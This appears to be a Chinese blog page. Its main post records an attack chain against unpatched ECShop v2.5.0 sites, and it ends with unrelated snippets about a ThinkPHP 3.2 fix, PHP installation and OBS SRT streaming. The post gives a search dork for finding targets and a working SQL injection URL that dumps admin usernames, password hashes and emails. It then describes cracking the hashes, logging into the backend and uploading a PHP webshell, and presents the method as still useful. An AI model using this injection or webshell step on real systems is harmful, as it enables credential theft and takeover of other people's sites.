很早的乙個漏洞,不過現在還有很多系統沒有修補,在安全測試中還是有用的。記錄一下。
(1)搜尋 "powered by ecshop v2.5.0"
(2)直接爆使用者密碼
user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
(3)獲取md5加密後的值,通過在cmd5上進行破解查詢。
(4)登陸後台
(5)在首頁輪播中上傳php的木馬
討論:如果在上傳部分做了限制,估計就比較難了。
ThinkPHP3 2版本安全更新
近日我們收到了乙個關於3.2版本的漏洞提醒,官方已經第一時間進行處理和更新。由於3.2版本已經過了官方的維護和安全更新週期,而且大量的開發者也進行了二次開發,因此不再發布新版,官方僅進行安全公告和修復建議。請還在使用3.2版本的使用者按照下面的方式進行安全修復 只需要修改一處核心內建公共函式 找到t...
PHP安裝與測試(5 6版本)
使用者註冊 資料加密 存到資料庫中 賬號 zhang zhang qweqw qweqw 密碼 abc123 abc123 dsada dsada apache php mysql附加 php上面接apache下面接mysql,所有php最後配置 yum y install gd gd庫是php處理...
OBS 25版本支援srt推流
月份obs開源社群推出obs25候選版本時,即開放了srt的推流功能測試。目前release版本已經能穩定的支援srt推流。srt的推流方式為,點開obs右下角的 設定 推流面板,引數設定如下 1.服務 請選擇自定義方式 2.伺服器 這一欄直接填寫接收端的完整url位址。比如我們要推流的伺服器ip位...